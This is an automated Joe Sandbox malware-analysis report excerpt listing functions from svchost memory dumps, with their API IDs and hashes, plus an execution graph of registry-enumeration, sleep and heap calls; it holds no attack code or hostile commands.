                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: d3f0363712b424162af198fcb1f2ccd060454dcd3d61e37f8d2bcd7dd235890b
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: 55912632758F5485F76ADF65AC4BBAD3BA0F344B8AF144189DE0A57A94CF34D482C708
                                                                                Function 00000257E10A7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: a2a4f887a9f13fcddb2c7929769560035c01c8ba1ff43c4decbc8a8071c20252
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: CA113C22754F018AEB01CF60FC5A3A833A4F719759F440E21EA6D867A4DF78C1A8C380
                                                                                Function 00000257E10A253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction ID: d8c6a38f007fb3a7686c76c7a8283c4c2af24b0e33f9ff83396385155cc53d9c
                                                                                • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                • Instruction Fuzzy Hash: 6F71E336288F8186E72EDE25BC5B3EE6B90F789B86F440066DD0A47B88DF34C641C714
                                                                                Function 00000257E1079E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 72cc404f53ef2108c57ae6d6efccfd71c2e81a8e4ff4a0d360792559cd38555b
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: CD61AC33608F848AEB2AEF65E8463AD77A0F344B99F044655EF4A17B98DB38D095C704
                                                                                Function 00000257E10A2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: f4fc28d39a0cdc524aee5adda2c2e0e63ac63cf0b53b223d59b02d2ca35e917c
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: 3E51063268CF8181F67EDE29B85F3AAA761F385781F440175DE9A03B49DE39C504C768
                                                                                Function 00000257E10B26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 36eee36a702be5d229b17d9c9138d260910e3688b71927c4caf75304bb23e6ee
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: FE41A232359F8082EB26DF25F84A7AA77A0F798795F504021EE4D87794EB3CD441CB48
                                                                                Function 00000257E10A94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: e302ae30e49da29a726c6f913943f5073bbf1f5ae9d0972a697904f802fd5f1d
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 55112B36219F8082EB668B25F84635977E5F788B95F584260EECD07758DF3CC551CB04
                                                                                Function 00000257E1077356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 5c07be2ebc4b5c2c17967540651cfe820deff558361af11c6e94b5f60bbdcb6a
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: 5FE086A1684F4490DF078F21FC4629873A0EB59B64F499162995C0A311FA38D1F9C300
                                                                                Function 00000257E10773B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308766980.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 558cecf372c16398b9b2aefa91b5521037ba77d7552cbc05b4debd7ca50bbfaf
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 65E086A1644F4490DF068F21E8421987360E759B54F889162C95C0A311EA38D1E5C300
                                                                                Function 00000257E10A1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 2d0e3eb43654a43f3f6b80af6b512799269a4d278d6165dc18c830e96e57c320
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: F8118C25645F4882EA0ADB66F84B72973A1FB89FC2F184468DE8D47766DE38C442C304
                                                                                Function 00000257E10A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000042.00000002.3308827903.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8832b056897a9b8ba16723e3fafdb3eff0c8063a4678bd85c9cbe2902852df6c
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 48E06535A41F0486EB09CF62EC0E74A36E1FB89F06F08C424C91907361DF7D8499CB90

                                                                                Execution Graph

                                                                                Execution Coverage:0.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:230
                                                                                Total number of Limit Nodes:4
                                                                                execution_graph 15014 1f28c1d273c 15015 1f28c1d276a 15014->15015 15016 1f28c1d2858 LoadLibraryA 15015->15016 15017 1f28c1d28d4 15015->15017 15016->15015 15018 1f28c931abc 15024 1f28c931628 GetProcessHeap 15018->15024 15020 1f28c931ad2 Sleep SleepEx 15022 1f28c931acb 15020->15022 15022->15020 15023 1f28c931598 StrCmpIW StrCmpW 15022->15023 15069 1f28c9318b4 15022->15069 15023->15022 15025 1f28c931648 __free_lconv_num 15024->15025 15086 1f28c931268 GetProcessHeap 15025->15086 15027 1f28c931650 15028 1f28c931268 2 API calls 15027->15028 15029 1f28c931661 15028->15029 15030 1f28c931268 2 API calls 15029->15030 15031 1f28c93166a 15030->15031 15032 1f28c931268 2 API calls 15031->15032 15033 1f28c931673 15032->15033 15034 1f28c93168e RegOpenKeyExW 15033->15034 15035 1f28c9318a6 15034->15035 15036 1f28c9316c0 RegOpenKeyExW 15034->15036 15035->15022 15037 1f28c9316e9 15036->15037 15038 1f28c9316ff RegOpenKeyExW 15036->15038 15090 1f28c9312bc RegQueryInfoKeyW 15037->15090 15040 1f28c931723 15038->15040 15041 1f28c93173a RegOpenKeyExW 15038->15041 15101 1f28c93104c RegQueryInfoKeyW 15040->15101 15043 1f28c931775 RegOpenKeyExW 15041->15043 15044 1f28c93175e 15041->15044 15048 1f28c931799 15043->15048 15049 1f28c9317b0 RegOpenKeyExW 15043->15049 15047 1f28c9312bc 11 API calls 15044->15047 15045 1f28c9316f5 RegCloseKey 15045->15038 15050 1f28c93176b RegCloseKey 15047->15050 15051 1f28c9312bc 11 API calls 15048->15051 15052 1f28c9317d4 15049->15052 15053 1f28c9317eb RegOpenKeyExW 15049->15053 15050->15043 15054 1f28c9317a6 RegCloseKey 15051->15054 15055 1f28c9312bc 11 API calls 15052->15055 15056 1f28c931826 RegOpenKeyExW 15053->15056 15057 1f28c93180f 15053->15057 15054->15049 15061 1f28c9317e1 RegCloseKey 15055->15061 15059 1f28c93184a 15056->15059 15060 1f28c931861 RegOpenKeyExW 15056->15060 15058 1f28c93104c 4 API calls 15057->15058 15062 1f28c93181c RegCloseKey 15058->15062 15063 1f28c93104c 4 API calls 15059->15063 15064 1f28c931885 15060->15064 15065 1f28c93189c RegCloseKey 15060->15065 15061->15053 15062->15056 15066 1f28c931857 RegCloseKey 15063->15066 15067 1f28c93104c 4 API calls 15064->15067 15065->15035 15066->15060 15068 1f28c931892 RegCloseKey 15067->15068 15068->15065 15113 1f28c9314a4 15069->15113 15107 1f28c946168 15086->15107 15088 1f28c931283 GetProcessHeap 15089 1f28c9312ae __free_lconv_num 15088->15089 15089->15027 15091 1f28c931327 GetProcessHeap 15090->15091 15095 1f28c93148a __free_lconv_num 15090->15095 15092 1f28c93133e __free_lconv_num 15091->15092 15093 1f28c931352 RegEnumValueW 15092->15093 15094 1f28c931476 GetProcessHeap 15092->15094 15097 1f28c9313d3 GetProcessHeap 15092->15097 15098 1f28c93141e lstrlenW GetProcessHeap 15092->15098 15099 1f28c9313f3 GetProcessHeap 15092->15099 15100 1f28c931443 StrCpyW 15092->15100 15108 1f28c93152c 15092->15108 15093->15092 15094->15095 15095->15045 15097->15092 15098->15092 15099->15092 15100->15092 15102 1f28c9311b5 RegCloseKey 15101->15102 15104 1f28c9310bf __free_lconv_num 15101->15104 15102->15041 15103 1f28c9310cf RegEnumValueW 15103->15104 15104->15102 15104->15103 15105 1f28c93114e GetProcessHeap 15104->15105 15106 1f28c93116e GetProcessHeap 15104->15106 15105->15104 15106->15104 15111 1f28c931546 15108->15111 15112 1f28c93157c 15108->15112 15109 1f28c931565 StrCmpW 15109->15111 15110 1f28c93155d StrCmpIW 15110->15111 15111->15109 15111->15110 15111->15112 15112->15092 15114 1f28c9314e1 GetProcessHeap 15113->15114 15115 1f28c9314c1 GetProcessHeap 15113->15115 15119 1f28c946180 15114->15119 15116 1f28c9314da __free_lconv_num 15115->15116 15116->15114 15116->15115 15120 1f28c946182 15119->15120 15121 1f28c93ca0c 15122 1f28c93ca57 15121->15122 15125 1f28c93ca1b __free_lconv_num 15121->15125 15130 1f28c93d6ac 15122->15130 15124 1f28c93ca55 15125->15122 15125->15124 15127 1f28c93b85c 15125->15127 15133 1f28c93b89c 15127->15133 15138 1f28c93cfa0 15130->15138 15132 1f28c93d6b5 15132->15124 15136 1f28c93c99c EnterCriticalSection 15133->15136 15137 1f28c946240 15136->15137 15139 1f28c93cfb5 __free_lconv_num 15138->15139 15140 1f28c93cfe1 FlsSetValue 15139->15140 15144 1f28c93cfd1 _invalid_parameter_noinfo 15139->15144 15141 1f28c93cff3 15140->15141 15140->15144 15154 1f28c93d6cc 15141->15154 15144->15132 15145 1f28c93d020 FlsSetValue 15147 1f28c93d03e 15145->15147 15148 1f28c93d02c FlsSetValue 15145->15148 15146 1f28c93d010 FlsSetValue 15149 1f28c93d019 15146->15149 15164 1f28c93cb94 15147->15164 15148->15149 15160 1f28c93d744 15149->15160 15153 1f28c93d744 __free_lconv_num EnterCriticalSection 15153->15144 15158 1f28c93d6dd __free_lconv_num 15154->15158 15155 1f28c93d72e 15156 1f28c93d6ac __free_lconv_num 5 API calls 15155->15156 15157 1f28c93d002 15156->15157 15157->15145 15157->15146 15158->15155 15158->15157 15159 1f28c93b85c __free_lconv_num EnterCriticalSection 15158->15159 15159->15158 15161 1f28c93d77a 15160->15161 15162 1f28c93d749 __free_lconv_num 15160->15162 15161->15144 15162->15161 15163 1f28c93d6ac __free_lconv_num 5 API calls 15162->15163 15163->15161 15169 1f28c93ca6c 15164->15169 15166 1f28c93cc46 15172 1f28c93caec 15166->15172 15168 1f28c93cc5b 15168->15153 15170 1f28c93c99c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 15169->15170 15171 1f28c93ca88 15170->15171 15171->15166 15173 1f28c93c99c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 15172->15173 15174 1f28c93cb08 15173->15174 15177 1f28c93cd7c 15174->15177 15176 1f28c93cb1e 15176->15168 15178 1f28c93cdc4 Concurrency::details::SchedulerProxy::DeleteThis 15177->15178 15179 1f28c93cd98 Concurrency::details::SchedulerProxy::DeleteThis 15177->15179 15178->15176 15179->15178 15181 1f28c9407b4 15179->15181 15182 1f28c940850 15181->15182 15190 1f28c9407d7 15181->15190 15183 1f28c9408a3 15182->15183 15185 1f28c93d744 __free_lconv_num 5 API calls 15182->15185 15247 1f28c940954 15183->15247 15186 1f28c940874 15185->15186 15187 1f28c93d744 __free_lconv_num 5 API calls 15186->15187 15192 1f28c940888 15187->15192 15188 1f28c940838 15193 1f28c93d744 __free_lconv_num 5 API calls 15188->15193 15189 1f28c940816 15189->15188 15196 1f28c93d744 __free_lconv_num 5 API calls 15189->15196 15190->15182 15190->15189 15191 1f28c93d744 __free_lconv_num 5 API calls 15190->15191 15194 1f28c94080a 15191->15194 15195 1f28c93d744 __free_lconv_num 5 API calls 15192->15195 15198 1f28c940844 15193->15198 15207 1f28c942fc8 15194->15207 15201 1f28c940897 15195->15201 15202 1f28c94082c 15196->15202 15197 1f28c94090e 15203 1f28c93d744 __free_lconv_num 5 API calls 15198->15203 15200 1f28c9408af 15200->15197 15204 1f28c93d744 5 API calls __free_lconv_num 15200->15204 15205 1f28c93d744 __free_lconv_num 5 API calls 15201->15205 15235 1f28c9430d4 15202->15235 15203->15182 15204->15200 15205->15183 15208 1f28c942fd1 15207->15208 15233 1f28c9430cc 15207->15233 15209 1f28c942feb 15208->15209 15210 1f28c93d744 __free_lconv_num 5 API calls 15208->15210 15211 1f28c942ffd 15209->15211 15212 1f28c93d744 __free_lconv_num 5 API calls 15209->15212 15210->15209 15213 1f28c94300f 15211->15213 15214 1f28c93d744 __free_lconv_num 5 API calls 15211->15214 15212->15211 15215 1f28c943021 15213->15215 15217 1f28c93d744 __free_lconv_num 5 API calls 15213->15217 15214->15213 15216 1f28c943033 15215->15216 15218 1f28c93d744 __free_lconv_num 5 API calls 15215->15218 15219 1f28c93d744 __free_lconv_num 5 API calls 15216->15219 15221 1f28c943045 15216->15221 15217->15215 15218->15216 15219->15221 15220 1f28c943057 15223 1f28c943069 15220->15223 15224 1f28c93d744 __free_lconv_num 5 API calls 15220->15224 15221->15220 15222 1f28c93d744 __free_lconv_num 5 API calls 15221->15222 15222->15220 15225 1f28c94307b 15223->15225 15226 1f28c93d744 __free_lconv_num 5 API calls 15223->15226 15224->15223 15227 1f28c94308d 15225->15227 15228 1f28c93d744 __free_lconv_num 5 API calls 15225->15228 15226->15225 15229 1f28c9430a2 15227->15229 15230 1f28c93d744 __free_lconv_num 5 API calls 15227->15230 15228->15227 15231 1f28c9430b7 15229->15231 15232 1f28c93d744 __free_lconv_num 5 API calls 15229->15232 15230->15229 15231->15233 15234 1f28c93d744 __free_lconv_num 5 API calls 15231->15234 15232->15231 15233->15189 15234->15233 15236 1f28c9430d9 15235->15236 15245 1f28c94313a 15235->15245 15237 1f28c9430f2 15236->15237 15238 1f28c93d744 __free_lconv_num 5 API calls 15236->15238 15239 1f28c93d744 __free_lconv_num 5 API calls 15237->15239 15241 1f28c943104 15237->15241 15238->15237 15239->15241 15240 1f28c943116 15243 1f28c943128 15240->15243 15244 1f28c93d744 __free_lconv_num 5 API calls 15240->15244 15241->15240 15242 1f28c93d744 __free_lconv_num 5 API calls 15241->15242 15242->15240 15243->15245 15246 1f28c93d744 __free_lconv_num 5 API calls 15243->15246 15244->15243 15245->15188 15246->15245 15248 1f28c940959 15247->15248 15249 1f28c940985 15247->15249 15248->15249 15253 1f28c943174 15248->15253 15249->15200 15252 1f28c93d744 __free_lconv_num 5 API calls 15252->15249 15254 1f28c94097d 15253->15254 15255 1f28c94317d 15253->15255 15254->15252 15289 1f28c943140 15255->15289 15258 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15259 1f28c9431a6 15258->15259 15260 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15259->15260 15261 1f28c9431b4 15260->15261 15262 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15261->15262 15263 1f28c9431c2 15262->15263 15264 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15263->15264 15265 1f28c9431d1 15264->15265 15266 1f28c93d744 __free_lconv_num 5 API calls 15265->15266 15267 1f28c9431dd 15266->15267 15268 1f28c93d744 __free_lconv_num 5 API calls 15267->15268 15269 1f28c9431e9 15268->15269 15270 1f28c93d744 __free_lconv_num 5 API calls 15269->15270 15271 1f28c9431f5 15270->15271 15272 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15271->15272 15273 1f28c943203 15272->15273 15274 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15273->15274 15275 1f28c943211 15274->15275 15276 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15275->15276 15277 1f28c94321f 15276->15277 15278 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15277->15278 15279 1f28c94322d 15278->15279 15280 1f28c943140 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 15279->15280 15281 1f28c94323c 15280->15281 15282 1f28c93d744 __free_lconv_num 5 API calls 15281->15282 15283 1f28c943248 15282->15283 15284 1f28c93d744 __free_lconv_num 5 API calls 15283->15284 15285 1f28c943254 15284->15285 15286 1f28c93d744 __free_lconv_num 5 API calls 15285->15286 15287 1f28c943260 15286->15287 15288 1f28c93d744 __free_lconv_num 5 API calls 15287->15288 15288->15254 15290 1f28c943167 15289->15290 15292 1f28c943156 15289->15292 15290->15258 15291 1f28c93d744 __free_lconv_num 5 API calls 15291->15292 15292->15290 15292->15291

                                                                                Executed Functions

                                                                                Function 000001F28C931268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8f8718106759883864cae2a8ca865240e286cea242c12ae6e8bb01d1b0de8f1e
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: F4E06DB5641E45C7EB048F62D8083AA3AE1FB8DF86F04C024C90907351DF7D8599C750
                                                                                Function 000001F28C93328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                • String ID:
                                                                                • API String ID: 1683269324-0
                                                                                • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction ID: b4d9601b441b195fc890c788491207d0644a6a96c7f54882ecefb715d9f87218
                                                                                • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                • Instruction Fuzzy Hash: B7118471AD0EC382FB60A731F8053F922D4B7543C5F98A1BCD90E87995EF79C0458200
                                                                                Function 000001F28C931ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 000001F28C931628: GetProcessHeap.KERNEL32 ref: 000001F28C931633
                                                                                  • Part of subcall function 000001F28C931628: HeapAlloc.KERNEL32 ref: 000001F28C931642
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316B2
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9316DF
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9316F9
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931719
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931734
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931754
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93176F
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93178F
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317AA
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C9317CA
                                                                                • Sleep.KERNEL32 ref: 000001F28C931AD7
                                                                                • SleepEx.KERNELBASE ref: 000001F28C931ADD
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9317E5
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931805
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931820
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C931840
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C93185B
                                                                                  • Part of subcall function 000001F28C931628: RegOpenKeyExW.ADVAPI32 ref: 000001F28C93187B
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C931896
                                                                                  • Part of subcall function 000001F28C931628: RegCloseKey.ADVAPI32 ref: 000001F28C9318A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1534210851-0
                                                                                • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction ID: b67c1932e62b7ac0013a9a1692b6bd7ceba26b73bf7a76d8ab9135420b3866fa
                                                                                • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                • Instruction Fuzzy Hash: 81316871281EC292EB509B36DA512F963F5AB84BD4F0C74B1DE09876BAFF34C851C211
                                                                                Function 000001F28C933844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 62 1f28c933844-1f28c93384f 63 1f28c933869-1f28c933870 62->63 64 1f28c933851-1f28c933864 StrCmpNIW 62->64 64->63 65 1f28c933866 64->65 65->63
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000043.00000002.3318590195.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
